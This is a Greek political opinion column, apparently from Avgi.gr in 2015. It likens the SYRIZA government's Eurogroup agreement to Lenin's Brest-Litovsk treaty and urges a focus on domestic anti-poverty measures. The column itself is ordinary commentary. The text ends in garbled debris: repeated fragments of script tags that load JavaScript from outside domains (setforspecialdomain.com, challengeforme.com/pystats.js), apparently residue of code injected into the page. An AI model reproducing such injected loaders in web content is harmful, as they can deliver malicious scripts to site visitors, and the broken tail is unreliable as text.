“Μπρεστ Θεσσαλονικόφσκ”… Κυρίτσης Γιώργος

Ο Λένιν διά χειρός Αντι Γουόρχολ (φωτ. Reuters)

Στη συνεδρίαση της Κ.Ε. του ΣΥΡΙΖΑ το Σαββατοκύριακο, αλλά και στην αρθρογραφία, αρκετοί επέλεξαν να αναφερθούν στην περιβόητη συνθήκη του Μπρεστ ΛιτόφσκΑυγή.gr, μια λεόντειο εις βάρος της Ρωσίας και υπέρ της Γερμανίας συμφωνία, με την οποία ο Λένιν επέλεξε να σταματήσει τον πόλεμο ώστε να ασχοληθεί με το εσωτερικό μέτωπο, δηλαδή με την επανάσταση.

Η Ρωσία του 1917 και η Ελλάδα του 2015 ουδεμία σχέση έχουν φυσικά και είναι πιθανό όσοι ανέσυραν την ιστορία αυτή να το έκαναν επειδή υπογράφτηκε σαν σήμερα. Ωστόσο, χωρίς να μπορεί κανείς να ανιχνεύσει απόλυτες αναλογίες, μπορεί πάντα να αντλήσει διδάγματα. Όχι τόσο από τη σφοδρή κριτική που υπέστη και την εμμονή που επέδειξε ο Λένιν στην Κ.Ε. των μπολσεβίκων, ή από την τελικώς θετική έκβαση της υπόθεσης με την ακύρωση των αποτελεσμάτων της συμφωνίας λίγα χρόνια αργότερα, αλλά από το γενικό περίγραμμα, που λέει: Κλείνοντας προσωρινά ένα μέτωπο, έχουμε τη δυνατότητα να ασχοληθούμε με το άλλο μέτωπο, με το τι γίνεται στο εσωτερικό, εκεί όπου οι συσχετισμοί διαμορφώνονται υπέρ μας και κυρίως εκεί όπου μπορούμε να ξεδιπλώσουμε το πρόγραμμά μας και να κάνουμε καλύτερες τις ζωές των ανθρώπων.

Αυτό έχει θέσει σε γενικές γραμμές ως προτεραιότητα η κυβέρνηση. Ανακωχή στο εξωτερικό, πόλεμος με τη φτώχεια, τα συμφέροντα, τις διαπλεκόμενες ελίτ στο εσωτερικό. Ακόμη και ο τραπεζικός στραγγαλισμός που επιχειρείται για να καθυποτάξει τη νέα κυβέρνηση έχει κυρίαρχη την εσωτερική πτυχή, ή τουλάχιστον εσωτερικά μπορεί να αντιμετωπιστεί ευκολότερα. Και οι περισσότεροι από τους υπουργούς, που ως κομματικά στελέχη, ως μέλη της Κ.Ε., επικρίνουν ή διαφωνούν με τη συμφωνία στο Εurogroup, την ίδια ώρα έχουν αναλάβει και ήδη υλοποιούν μέσα από τρομακτικές δυσκολίες κομμάτια του προγράμματος της Θεσσαλονίκης που περιέχονται στη “λίστα Βαρουφάκη” και είναι κρίσιμης σημασίας, όπως η σίτιση, η ηλεκτροδότηση, η στέγη.

Πρόκειται για δύσκολη μάχη. Ιδίως αυτά που έχουν να κάνουν με την ανθρωπιστική κρίση, με το χτύπημα της φοροδιαφυγής και την ανακατανομή των βαρών από τα χαμηλά και μεσαία στρώματα στα υψηλά εισοδήματα και στις “ελίτ”. Αν, πάντως, πρέπει να έχουμε οπωσδήποτε τον Λένιν στο μυαλό μας, θα μπορούσαμε να παραφράσουμε λέγοντας πως σοσιαλισμός είναι… ο εξηλεκτρισμός των φτωχών και η φορολόγηση των πλουσίων.

Αυγή.gr___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >